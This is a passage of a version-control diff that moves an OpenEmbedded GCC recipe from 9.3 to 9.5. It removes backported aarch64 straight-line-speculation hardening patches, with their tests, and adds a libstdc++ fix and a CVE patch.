--  if (to == TAILCALL_ADDR_REGS || to == POINTER_REGS)
-+  if (to == TAILCALL_ADDR_REGS || to == POINTER_REGS
-+      || to == STUB_REGS)
-     to = GENERAL_REGS;
- 
--  if (from == TAILCALL_ADDR_REGS || from == POINTER_REGS)
-+  if (from == TAILCALL_ADDR_REGS || from == POINTER_REGS
-+      || from == STUB_REGS)
-     from = GENERAL_REGS;
- 
-   /* Moving between GPR and stack cost is the same as GP2GP.  */
-@@ -19009,6 +19015,215 @@ aarch64_sls_barrier (int mitigation_required)
-     : "";
- }
- 
-+static GTY (()) tree aarch64_sls_shared_thunks[30];
-+static GTY (()) bool aarch64_sls_shared_thunks_needed = false;
-+const char *indirect_symbol_names[30] = {
-+    "__call_indirect_x0",
-+    "__call_indirect_x1",
-+    "__call_indirect_x2",
-+    "__call_indirect_x3",
-+    "__call_indirect_x4",
-+    "__call_indirect_x5",
-+    "__call_indirect_x6",
-+    "__call_indirect_x7",
-+    "__call_indirect_x8",
-+    "__call_indirect_x9",
-+    "__call_indirect_x10",
-+    "__call_indirect_x11",
-+    "__call_indirect_x12",
-+    "__call_indirect_x13",
-+    "__call_indirect_x14",
-+    "__call_indirect_x15",
-+    "", /* "__call_indirect_x16",  */
-+    "", /* "__call_indirect_x17",  */
-+    "__call_indirect_x18",
-+    "__call_indirect_x19",
-+    "__call_indirect_x20",
-+    "__call_indirect_x21",
-+    "__call_indirect_x22",
-+    "__call_indirect_x23",
-+    "__call_indirect_x24",
-+    "__call_indirect_x25",
-+    "__call_indirect_x26",
-+    "__call_indirect_x27",
-+    "__call_indirect_x28",
-+    "__call_indirect_x29",
-+};
-+
-+/* Function to create a BLR thunk.  This thunk is used to mitigate straight
-+   line speculation.  Instead of a simple BLR that can be speculated past,
-+   we emit a BL to this thunk, and this thunk contains a BR to the relevant
-+   register.  These thunks have the relevant speculation barries put after
-+   their indirect branch so that speculation is blocked.
-+
-+   We use such a thunk so the speculation barriers are kept off the
-+   architecturally executed path in order to reduce the performance overhead.
-+
-+   When optimizing for size we use stubs shared by the linked object.
-+   When optimizing for performance we emit stubs for each function in the hope
-+   that the branch predictor can better train on jumps specific for a given
-+   function.  */
-+rtx
-+aarch64_sls_create_blr_label (int regnum)
-+{
-+  gcc_assert (STUB_REGNUM_P (regnum));
-+  if (optimize_function_for_size_p (cfun))
-+    {
-+      /* For the thunks shared between different functions in this compilation
-+	 unit we use a named symbol -- this is just for users to more easily
-+	 understand the generated assembly.  */
-+      aarch64_sls_shared_thunks_needed = true;
-+      const char *thunk_name = indirect_symbol_names[regnum];
-+      if (aarch64_sls_shared_thunks[regnum] == NULL)
-+	{
-+	  /* Build a decl representing this function stub and record it for
-+	     later.  We build a decl here so we can use the GCC machinery for
-+	     handling sections automatically (through `get_named_section` and
-+	     `make_decl_one_only`).  That saves us a lot of trouble handling
-+	     the specifics of different output file formats.  */
-+	  tree decl = build_decl (BUILTINS_LOCATION, FUNCTION_DECL,
-+				  get_identifier (thunk_name),
-+				  build_function_type_list (void_type_node,
-+							    NULL_TREE));
-+	  DECL_RESULT (decl) = build_decl (BUILTINS_LOCATION, RESULT_DECL,
-+					   NULL_TREE, void_type_node);
-+	  TREE_PUBLIC (decl) = 1;
-+	  TREE_STATIC (decl) = 1;
-+	  DECL_IGNORED_P (decl) = 1;
-+	  DECL_ARTIFICIAL (decl) = 1;
-+	  make_decl_one_only (decl, DECL_ASSEMBLER_NAME (decl));
-+	  resolve_unique_section (decl, 0, false);
-+	  aarch64_sls_shared_thunks[regnum] = decl;
-+	}
-+
-+      return gen_rtx_SYMBOL_REF (Pmode, thunk_name);
-+    }
-+
-+  if (cfun->machine->call_via[regnum] == NULL)
-+    cfun->machine->call_via[regnum]
-+      = gen_rtx_LABEL_REF (Pmode, gen_label_rtx ());
-+  return cfun->machine->call_via[regnum];
-+}
-+
-+/* Helper function for aarch64_sls_emit_blr_function_thunks and
-+   aarch64_sls_emit_shared_blr_thunks below.  */
-+static void
-+aarch64_sls_emit_function_stub (FILE *out_file, int regnum)
-+{
-+  /* Save in x16 and branch to that function so this transformation does
-+     not prevent jumping to `BTI c` instructions.  */
-+  asm_fprintf (out_file, "\tmov\tx16, x%d\n", regnum);
-+  asm_fprintf (out_file, "\tbr\tx16\n");
-+}
-+
-+/* Emit all BLR stubs for this particular function.
-+   Here we emit all the BLR stubs needed for the current function.  Since we
-+   emit these stubs in a consecutive block we know there will be no speculation
-+   gadgets between each stub, and hence we only emit a speculation barrier at
-+   the end of the stub sequences.
-+
-+   This is called in the TARGET_ASM_FUNCTION_EPILOGUE hook.  */
-+void
-+aarch64_sls_emit_blr_function_thunks (FILE *out_file)
-+{
-+  if (! aarch64_harden_sls_blr_p ())
-+    return;
-+
-+  bool any_functions_emitted = false;
-+  /* We must save and restore the current function section since this assembly
-+     is emitted at the end of the function.  This means it can be emitted *just
-+     after* the cold section of a function.  That cold part would be emitted in
-+     a different section.  That switch would trigger a `.cfi_endproc` directive
-+     to be emitted in the original section and a `.cfi_startproc` directive to
-+     be emitted in the new section.  Switching to the original section without
-+     restoring would mean that the `.cfi_endproc` emitted as a function ends
-+     would happen in a different section -- leaving an unmatched
-+     `.cfi_startproc` in the cold text section and an unmatched `.cfi_endproc`
-+     in the standard text section.  */
-+  section *save_text_section = in_section;
-+  switch_to_section (function_section (current_function_decl));
-+  for (int regnum = 0; regnum < 30; ++regnum)
-+    {
-+      rtx specu_label = cfun->machine->call_via[regnum];
-+      if (specu_label == NULL)
-+	continue;
-+
-+      targetm.asm_out.print_operand (out_file, specu_label, 0);
-+      asm_fprintf (out_file, ":\n");
-+      aarch64_sls_emit_function_stub (out_file, regnum);
-+      any_functions_emitted = true;
-+    }
-+  if (any_functions_emitted)
-+    /* Can use the SB if needs be here, since this stub will only be used
-+      by the current function, and hence for the current target.  */
-+    asm_fprintf (out_file, "\t%s\n", aarch64_sls_barrier (true));
-+  switch_to_section (save_text_section);
-+}
-+
-+/* Emit shared BLR stubs for the current compilation unit.
-+   Over the course of compiling this unit we may have converted some BLR
-+   instructions to a BL to a shared stub function.  This is where we emit those
-+   stub functions.
-+   This function is for the stubs shared between different functions in this
-+   compilation unit.  We share when optimizing for size instead of speed.
-+
-+   This function is called through the TARGET_ASM_FILE_END hook.  */
-+void
-+aarch64_sls_emit_shared_blr_thunks (FILE *out_file)
-+{
-+  if (! aarch64_sls_shared_thunks_needed)
-+    return;
-+
-+  for (int regnum = 0; regnum < 30; ++regnum)
-+    {
-+      tree decl = aarch64_sls_shared_thunks[regnum];
-+      if (!decl)
-+	continue;
-+
-+      const char *name = indirect_symbol_names[regnum];
-+      switch_to_section (get_named_section (decl, NULL, 0));
-+      ASM_OUTPUT_ALIGN (out_file, 2);
-+      targetm.asm_out.globalize_label (out_file, name);
-+      /* Only emits if the compiler is configured for an assembler that can
-+	 handle visibility directives.  */
-+      targetm.asm_out.assemble_visibility (decl, VISIBILITY_HIDDEN);
-+      ASM_OUTPUT_TYPE_DIRECTIVE (out_file, name, "function");
-+      ASM_OUTPUT_LABEL (out_file, name);
-+      aarch64_sls_emit_function_stub (out_file, regnum);
-+      /* Use the most conservative target to ensure it can always be used by any
-+	 function in the translation unit.  */
-+      asm_fprintf (out_file, "\tdsb\tsy\n\tisb\n");
-+      ASM_DECLARE_FUNCTION_SIZE (out_file, name, decl);
-+    }
-+}
-+
-+/* Implement TARGET_ASM_FILE_END.  */
-+void
-+aarch64_asm_file_end ()
-+{
-+  aarch64_sls_emit_shared_blr_thunks (asm_out_file);
-+  /* Since this function will be called for the ASM_FILE_END hook, we ensure
-+     that what would be called otherwise (e.g. `file_end_indicate_exec_stack`
-+     for FreeBSD) still gets called.  */
-+#ifdef TARGET_ASM_FILE_END
-+  TARGET_ASM_FILE_END ();
-+#endif
-+}
-+
-+const char *
-+aarch64_indirect_call_asm (rtx addr)
-+{
-+  gcc_assert (REG_P (addr));
-+  if (aarch64_harden_sls_blr_p ())
-+    {
-+      rtx stub_label = aarch64_sls_create_blr_label (REGNO (addr));
-+      output_asm_insn ("bl\t%0", &stub_label);
-+    }
-+  else
-+   output_asm_insn ("blr\t%0", &addr);
-+  return "";
-+}
-+
- /* Target-specific selftests.  */
- 
- #if CHECKING_P
-@@ -19529,6 +19744,12 @@ aarch64_libgcc_floating_mode_supported_p
- #define TARGET_RUN_TARGET_SELFTESTS selftest::aarch64_run_selftests
- #endif /* #if CHECKING_P */
- 
-+#undef TARGET_ASM_FILE_END
-+#define TARGET_ASM_FILE_END aarch64_asm_file_end
-+
-+#undef TARGET_ASM_FUNCTION_EPILOGUE
-+#define TARGET_ASM_FUNCTION_EPILOGUE aarch64_sls_emit_blr_function_thunks
-+
- struct gcc_target targetm = TARGET_INITIALIZER;
- 
- #include "gt-aarch64.h"
-diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
-index 72ddc6fd9..60682a100 100644
---- a/gcc/config/aarch64/aarch64.h
-+++ b/gcc/config/aarch64/aarch64.h
-@@ -540,6 +540,16 @@ extern unsigned aarch64_architecture_version;
- #define GP_REGNUM_P(REGNO)						\
-   (((unsigned) (REGNO - R0_REGNUM)) <= (R30_REGNUM - R0_REGNUM))
- 
-+/* Registers known to be preserved over a BL instruction.  This consists of the
-+   GENERAL_REGS without x16, x17, and x30.  The x30 register is changed by the
-+   BL instruction itself, while the x16 and x17 registers may be used by
-+   veneers which can be inserted by the linker.  */
-+#define STUB_REGNUM_P(REGNO) \
-+  (GP_REGNUM_P (REGNO) \
-+   && (REGNO) != R16_REGNUM \
-+   && (REGNO) != R17_REGNUM \
-+   && (REGNO) != R30_REGNUM) \
-+
- #define FP_REGNUM_P(REGNO)			\
-   (((unsigned) (REGNO - V0_REGNUM)) <= (V31_REGNUM - V0_REGNUM))
- 
-@@ -561,6 +571,7 @@ enum reg_class
- {
-   NO_REGS,
-   TAILCALL_ADDR_REGS,
-+  STUB_REGS,
-   GENERAL_REGS,
-   STACK_REG,
-   POINTER_REGS,
-@@ -580,6 +591,7 @@ enum reg_class
- {						\
-   "NO_REGS",					\
-   "TAILCALL_ADDR_REGS",				\
-+  "STUB_REGS",					\
-   "GENERAL_REGS",				\
-   "STACK_REG",					\
-   "POINTER_REGS",				\
-@@ -596,6 +608,7 @@ enum reg_class
- {									\
-   { 0x00000000, 0x00000000, 0x00000000 },	/* NO_REGS */		\
-   { 0x00030000, 0x00000000, 0x00000000 },	/* TAILCALL_ADDR_REGS */\
-+  { 0x3ffcffff, 0x00000000, 0x00000000 },	/* STUB_REGS */		\
-   { 0x7fffffff, 0x00000000, 0x00000003 },	/* GENERAL_REGS */	\
-   { 0x80000000, 0x00000000, 0x00000000 },	/* STACK_REG */		\
-   { 0xffffffff, 0x00000000, 0x00000003 },	/* POINTER_REGS */	\
-@@ -735,6 +748,8 @@ typedef struct GTY (()) machine_function
-   struct aarch64_frame frame;
-   /* One entry for each hard register.  */
-   bool reg_is_wrapped_separately[LAST_SAVED_REGNUM];
-+  /* One entry for each general purpose register.  */
-+  rtx call_via[SP_REGNUM];
-   bool label_is_assembled;
- } machine_function;
- #endif
-diff --git a/gcc/config/aarch64/aarch64.md b/gcc/config/aarch64/aarch64.md
-index 494aee964..ed8cf8ece 100644
---- a/gcc/config/aarch64/aarch64.md
-+++ b/gcc/config/aarch64/aarch64.md
-@@ -908,15 +908,14 @@
- )
- 
- (define_insn "*call_insn"
--  [(call (mem:DI (match_operand:DI 0 "aarch64_call_insn_operand" "r, Usf"))
-+  [(call (mem:DI (match_operand:DI 0 "aarch64_call_insn_operand" "Ucr, Usf"))
- 	 (match_operand 1 "" ""))
-    (clobber (reg:DI LR_REGNUM))]
-   ""
-   "@
--  blr\\t%0
-+  * return aarch64_indirect_call_asm (operands[0]);
-   bl\\t%c0"
--  [(set_attr "type" "call, call")]
--)
-+  [(set_attr "type" "call, call")])
- 
- (define_expand "call_value"
-   [(parallel [(set (match_operand 0 "" "")
-@@ -934,12 +933,12 @@
- 
- (define_insn "*call_value_insn"
-   [(set (match_operand 0 "" "")
--	(call (mem:DI (match_operand:DI 1 "aarch64_call_insn_operand" "r, Usf"))
-+	(call (mem:DI (match_operand:DI 1 "aarch64_call_insn_operand" "Ucr, Usf"))
- 		      (match_operand 2 "" "")))
-    (clobber (reg:DI LR_REGNUM))]
-   ""
-   "@
--  blr\\t%1
-+  * return aarch64_indirect_call_asm (operands[1]);
-   bl\\t%c1"
-   [(set_attr "type" "call, call")]
- )
-diff --git a/gcc/config/aarch64/constraints.md b/gcc/config/aarch64/constraints.md
-index 21f9549e6..7756dbe83 100644
---- a/gcc/config/aarch64/constraints.md
-+++ b/gcc/config/aarch64/constraints.md
-@@ -24,6 +24,15 @@
- (define_register_constraint "Ucs" "TAILCALL_ADDR_REGS"
-   "@internal Registers suitable for an indirect tail call")
- 
-+(define_register_constraint "Ucr"
-+    "aarch64_harden_sls_blr_p () ? STUB_REGS : GENERAL_REGS"
-+  "@internal Registers to be used for an indirect call.
-+   This is usually the general registers, but when we are hardening against
-+   Straight Line Speculation we disallow x16, x17, and x30 so we can use
-+   indirection stubs.  These indirection stubs cannot use the above registers
-+   since they will be reached by a BL that may have to go through a linker
-+   veneer.")
-+
- (define_register_constraint "w" "FP_REGS"
-   "Floating point and SIMD vector registers.")
- 
-diff --git a/gcc/config/aarch64/predicates.md b/gcc/config/aarch64/predicates.md
-index 8e1b78421..4250aecb3 100644
---- a/gcc/config/aarch64/predicates.md
-+++ b/gcc/config/aarch64/predicates.md
-@@ -32,7 +32,8 @@
- 
- (define_predicate "aarch64_general_reg"
-   (and (match_operand 0 "register_operand")
--       (match_test "REGNO_REG_CLASS (REGNO (op)) == GENERAL_REGS")))
-+       (match_test "REGNO_REG_CLASS (REGNO (op)) == STUB_REGS
-+		    || REGNO_REG_CLASS (REGNO (op)) == GENERAL_REGS")))
- 
- ;; Return true if OP a (const_int 0) operand.
- (define_predicate "const0_operand"
-diff --git a/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr-bti.c b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr-bti.c
-new file mode 100644
-index 000000000..b1fb754c7
---- /dev/null
-+++ b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr-bti.c
-@@ -0,0 +1,40 @@
-+/* { dg-do compile } */
-+/* { dg-additional-options "-mharden-sls=blr -mbranch-protection=bti" } */
-+/*
-+   Ensure that the SLS hardening of BLR leaves no BLR instructions.
-+   Here we also check that there are no BR instructions with anything except an
-+   x16 or x17 register.  This is because a `BTI c` instruction can be branched
-+   to using a BLR instruction using any register, but can only be branched to
-+   with a BR using an x16 or x17 register.
-+  */
-+typedef int (foo) (int, int);
-+typedef void (bar) (int, int);
-+struct sls_testclass {
-+    foo *x;
-+    bar *y;
-+    int left;
-+    int right;
-+};
-+
-+/* We test both RTL patterns for a call which returns a value and a call which
-+   does not.  */
-+int blr_call_value (struct sls_testclass x)
-+{
-+  int retval = x.x(x.left, x.right);
-+  if (retval % 10)
-+    return 100;
-+  return 9;
-+}
-+
-+int blr_call (struct sls_testclass x)
-+{
-+  x.y(x.left, x.right);
-+  if (x.left % 10)
-+    return 100;
-+  return 9;
-+}
-+
-+/* { dg-final { scan-assembler-not {\tblr\t} } } */
-+/* { dg-final { scan-assembler-not {\tbr\tx(?!16|17)} } } */
-+/* { dg-final { scan-assembler {\tbr\tx(16|17)} } } */
-+
-diff --git a/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr.c b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr.c
-new file mode 100644
-index 000000000..88baffffe
---- /dev/null
-+++ b/gcc/testsuite/gcc.target/aarch64/sls-mitigation/sls-miti-blr.c
-@@ -0,0 +1,33 @@
-+/* { dg-additional-options "-mharden-sls=blr -save-temps" } */
-+/* Ensure that the SLS hardening of BLR leaves no BLR instructions.
-+   We only test that all BLR instructions have been removed, not that the
-+   resulting code makes sense.  */
-+typedef int (foo) (int, int);
-+typedef void (bar) (int, int);
-+struct sls_testclass {
-+    foo *x;
-+    bar *y;
-+    int left;
-+    int right;
-+};
-+
-+/* We test both RTL patterns for a call which returns a value and a call which
-+   does not.  */
-+int blr_call_value (struct sls_testclass x)
-+{
-+  int retval = x.x(x.left, x.right);
-+  if (retval % 10)
-+    return 100;
-+  return 9;
-+}
-+
-+int blr_call (struct sls_testclass x)
-+{
-+  x.y(x.left, x.right);
-+  if (x.left % 10)
-+    return 100;
-+  return 9;
-+}
-+
-+/* { dg-final { scan-assembler-not {\tblr\t} } } */
-+/* { dg-final { scan-assembler {\tbr\tx[0-9][0-9]?} } } */
--- 
-2.25.1
-
diff --git a/meta/recipes-devtools/gcc/gcc-9.3.inc b/meta/recipes-devtools/gcc/gcc-9.5.inc
index 4c54ba250a..9bb41bbe24 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3.inc
+++ b/meta/recipes-devtools/gcc/gcc-9.5.inc
@@ -2,13 +2,13 @@ require gcc-common.inc
 
 # Third digit in PV should be incremented after a minor release
 
-PV = "9.3.0"
+PV = "9.5.0"
 
 # BINV should be incremented to a revision after a minor gcc release
 
-BINV = "9.3.0"
+BINV = "9.5.0"
 
-FILESEXTRAPATHS =. "${FILE_DIRNAME}/gcc-9.3:${FILE_DIRNAME}/gcc-9.3/backport:"
+FILESEXTRAPATHS =. "${FILE_DIRNAME}/gcc-9.5:${FILE_DIRNAME}/gcc-9.5/backport:"
 
 DEPENDS =+ "mpfr gmp libmpc zlib flex-native"
 NATIVEDEPS = "mpfr-native gmp-native libmpc-native zlib-native flex-native"
@@ -69,15 +69,14 @@ SRC_URI = "\
            file://0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch \
            file://0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch \
            file://0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch \
-           file://0001-aarch64-New-Straight-Line-Speculation-SLS-mitigation.patch \
-           file://0002-aarch64-Introduce-SLS-mitigation-for-RET-and-BR-inst.patch \
-           file://0003-aarch64-Mitigate-SLS-for-BLR-instruction.patch \
+           file://0002-libstdc-Fix-inconsistent-noexcept-specific-for-valar.patch \
+           file://CVE-2023-4039.patch \
 "
 S = "${TMPDIR}/work-shared/gcc-${PV}-${PR}/gcc-${PV}"
-SRC_URI[sha256sum] = "71e197867611f6054aa1119b13a0c0abac12834765fe2d81f35ac57f84f742d1"
+SRC_URI[sha256sum] = "27769f64ef1d4cd5e2be8682c0c93f9887983e6cfd1a927ce5a0a2915a95cf8f"
 # For dev release snapshotting
 #S = "${TMPDIR}/work-shared/gcc-${PV}-${PR}/official-gcc-${RELEASE}"
-#B = "${WORKDIR}/gcc-${PV}/build.${HOST_SYS}.${TARGET_SYS}"
+B = "${WORKDIR}/gcc-${PV}/build.${HOST_SYS}.${TARGET_SYS}"
 
 # Language Overrides
 FORTRAN = ""
@@ -122,3 +121,6 @@ EXTRA_OECONF_PATHS = "\
     --with-sysroot=/not/exist \
     --with-build-sysroot=${STAGING_DIR_TARGET} \
 "
+
+# Is a binutils 2.26 issue, not gcc
+CVE_CHECK_WHITELIST += "CVE-2021-37322"
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0001-gcc-4.3.1-ARCH_FLAGS_FOR_TARGET.patch b/meta/recipes-devtools/gcc/gcc-9.5/0001-gcc-4.3.1-ARCH_FLAGS_FOR_TARGET.patch
index 0d9222df17..0d9222df17 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0001-gcc-4.3.1-ARCH_FLAGS_FOR_TARGET.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0001-gcc-4.3.1-ARCH_FLAGS_FOR_TARGET.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0002-gcc-poison-system-directories.patch b/meta/recipes-devtools/gcc/gcc-9.5/0002-gcc-poison-system-directories.patch
index f427ee67c1..f427ee67c1 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0002-gcc-poison-system-directories.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0002-gcc-poison-system-directories.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.5/0002-libstdc-Fix-inconsistent-noexcept-specific-for-valar.patch b/meta/recipes-devtools/gcc/gcc-9.5/0002-libstdc-Fix-inconsistent-noexcept-specific-for-valar.patch
new file mode 100644
index 0000000000..506064bfc2
--- /dev/null
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0002-libstdc-Fix-inconsistent-noexcept-specific-for-valar.patch
@@ -0,0 +1,44 @@
+From 60d966708d7cf105dccf128d2b7a38b0b2580a1a Mon Sep 17 00:00:00 2001
+From: Jonathan Wakely <jwakely@redhat.com>
+Date: Fri, 5 Nov 2021 21:42:20 +0000
+Subject: [PATCH] libstdc++: Fix inconsistent noexcept-specific for valarray
+ begin/end
+
+These declarations should be noexcept after I added it to the
+definitions in <valarray>.
+
+libstdc++-v3/ChangeLog:
+
+	* include/bits/range_access.h (begin(valarray), end(valarray)):
+	Add noexcept.
+
+(cherry picked from commit 2b2d97fc545635a0f6aa9c9ee3b017394bc494bf)
+
+Upstream-Status: Backport [https://github.com/hkaelber/gcc/commit/2b2d97fc545635a0f6aa9c9ee3b017394bc494bf]
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+
+---
+ libstdc++-v3/include/bits/range_access.h | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/libstdc++-v3/include/bits/range_access.h b/libstdc++-v3/include/bits/range_access.h
+index 3d99ea92027..4736e75fda1 100644
+--- a/libstdc++-v3/include/bits/range_access.h
++++ b/libstdc++-v3/include/bits/range_access.h
+@@ -101,10 +101,10 @@ _GLIBCXX_BEGIN_NAMESPACE_VERSION
+ 
+   template<typename _Tp> class valarray;
+   // These overloads must be declared for cbegin and cend to use them.
+-  template<typename _Tp> _Tp* begin(valarray<_Tp>&);
+-  template<typename _Tp> const _Tp* begin(const valarray<_Tp>&);
+-  template<typename _Tp> _Tp* end(valarray<_Tp>&);
+-  template<typename _Tp> const _Tp* end(const valarray<_Tp>&);
++  template<typename _Tp> _Tp* begin(valarray<_Tp>&) noexcept;
++  template<typename _Tp> const _Tp* begin(const valarray<_Tp>&) noexcept;
++  template<typename _Tp> _Tp* end(valarray<_Tp>&) noexcept;
++  template<typename _Tp> const _Tp* end(const valarray<_Tp>&) noexcept;
+ 
+   /**
+    *  @brief  Return an iterator pointing to the first element of
+-- 
+2.25.1
\ No newline at end of file
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0003-gcc-4.3.3-SYSROOT_CFLAGS_FOR_TARGET.patch b/meta/recipes-devtools/gcc/gcc-9.5/0003-gcc-4.3.3-SYSROOT_CFLAGS_FOR_TARGET.patch
index 23ec5bce03..23ec5bce03 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0003-gcc-4.3.3-SYSROOT_CFLAGS_FOR_TARGET.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0003-gcc-4.3.3-SYSROOT_CFLAGS_FOR_TARGET.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0004-64-bit-multilib-hack.patch b/meta/recipes-devtools/gcc/gcc-9.5/0004-64-bit-multilib-hack.patch
index 17ec8986c1..17ec8986c1 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0004-64-bit-multilib-hack.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0004-64-bit-multilib-hack.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0005-optional-libstdc.patch b/meta/recipes-devtools/gcc/gcc-9.5/0005-optional-libstdc.patch
index 3c28aeac63..3c28aeac63 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0005-optional-libstdc.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0005-optional-libstdc.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0006-COLLECT_GCC_OPTIONS.patch b/meta/recipes-devtools/gcc/gcc-9.5/0006-COLLECT_GCC_OPTIONS.patch
index 906f3a7317..906f3a7317 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0006-COLLECT_GCC_OPTIONS.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0006-COLLECT_GCC_OPTIONS.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0007-Use-the-defaults.h-in-B-instead-of-S-and-t-oe-in-B.patch b/meta/recipes-devtools/gcc/gcc-9.5/0007-Use-the-defaults.h-in-B-instead-of-S-and-t-oe-in-B.patch
index 68a876cb95..68a876cb95 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0007-Use-the-defaults.h-in-B-instead-of-S-and-t-oe-in-B.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0007-Use-the-defaults.h-in-B-instead-of-S-and-t-oe-in-B.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0008-fortran-cross-compile-hack.patch b/meta/recipes-devtools/gcc/gcc-9.5/0008-fortran-cross-compile-hack.patch
index 6acd2b0cf9..6acd2b0cf9 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0008-fortran-cross-compile-hack.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0008-fortran-cross-compile-hack.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0009-cpp-honor-sysroot.patch b/meta/recipes-devtools/gcc/gcc-9.5/0009-cpp-honor-sysroot.patch
index 5a9e527606..5a9e527606 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0009-cpp-honor-sysroot.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0009-cpp-honor-sysroot.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0010-MIPS64-Default-to-N64-ABI.patch b/meta/recipes-devtools/gcc/gcc-9.5/0010-MIPS64-Default-to-N64-ABI.patch
index a8103b951e..a8103b951e 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0010-MIPS64-Default-to-N64-ABI.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0010-MIPS64-Default-to-N64-ABI.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0011-Define-GLIBC_DYNAMIC_LINKER-and-UCLIBC_DYNAMIC_LINKE.patch b/meta/recipes-devtools/gcc/gcc-9.5/0011-Define-GLIBC_DYNAMIC_LINKER-and-UCLIBC_DYNAMIC_LINKE.patch
index d9d563d0f7..d9d563d0f7 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0011-Define-GLIBC_DYNAMIC_LINKER-and-UCLIBC_DYNAMIC_LINKE.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0011-Define-GLIBC_DYNAMIC_LINKER-and-UCLIBC_DYNAMIC_LINKE.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0012-gcc-Fix-argument-list-too-long-error.patch b/meta/recipes-devtools/gcc/gcc-9.5/0012-gcc-Fix-argument-list-too-long-error.patch
index 9d98878096..f0b79ee145 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0012-gcc-Fix-argument-list-too-long-error.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0012-gcc-Fix-argument-list-too-long-error.patch
@@ -17,6 +17,10 @@ $(sort list) doesn't need this.
 Signed-off-by: Robert Yang <liezhi.yang@windriver.com>
 Signed-off-by: Khem Raj <raj.khem@gmail.com>
 
+RP: gcc then added *.h and *.def additions to this list, breaking the original
+fix. Add the sort to the original gcc code, leaving the tr+sort to fix the original
+issue but include the new files too as reported by Zhuang <qiuguang.zqg@alibaba-inc.com>
+
 Upstream-Status: Pending
 ---
  gcc/Makefile.in | 2 +-
@@ -31,7 +35,7 @@ index fef6c4c61e3..57cf7804f0a 100644
  # files. All other files are flattened to a single directory.
  	$(mkinstalldirs) $(DESTDIR)$(plugin_includedir)
 -	headers=`echo $(PLUGIN_HEADERS) $$(cd $(srcdir); echo *.h *.def) | tr ' ' '\012' | sort -u`; \
-+	headers="$(sort $(PLUGIN_HEADERS) $$(cd $(srcdir); echo *.h *.def))"; \
++	headers=`echo $(sort $(PLUGIN_HEADERS)) $$(cd $(srcdir); echo *.h *.def) | tr ' ' '\012' | sort -u`; \
  	srcdirstrip=`echo "$(srcdir)" | sed 's/[].[^$$\\*|]/\\\\&/g'`; \
  	for file in $$headers; do \
  	  if [ -f $$file ] ; then \
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0013-Disable-sdt.patch b/meta/recipes-devtools/gcc/gcc-9.5/0013-Disable-sdt.patch
index 455858354f..455858354f 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0013-Disable-sdt.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0013-Disable-sdt.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0014-libtool.patch b/meta/recipes-devtools/gcc/gcc-9.5/0014-libtool.patch
index 2953859238..2953859238 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0014-libtool.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0014-libtool.patch
diff --git a/meta/recipes-devtools/gcc/gcc-9.3/0015-gcc-armv4-pass-fix-v4bx-to-linker-to-support-EABI.patch b/meta/recipes-devtools/gcc/gcc-9.5/0015-gcc-armv4-pass-fix-v4bx-to-linker-to-support-EABI.patch
index d4445244e2..d4445244e2 100644
--- a/meta/recipes-devtools/gcc/gcc-9.3/0015-gcc-armv4-pass-fix-v4bx-to-linker-to-support-EABI.patch
+++ b/meta/recipes-devtools/gcc/gcc-9.5/0015-gcc-armv4-pass-fix-v4bx-to-linker-to-support-EABI.patch
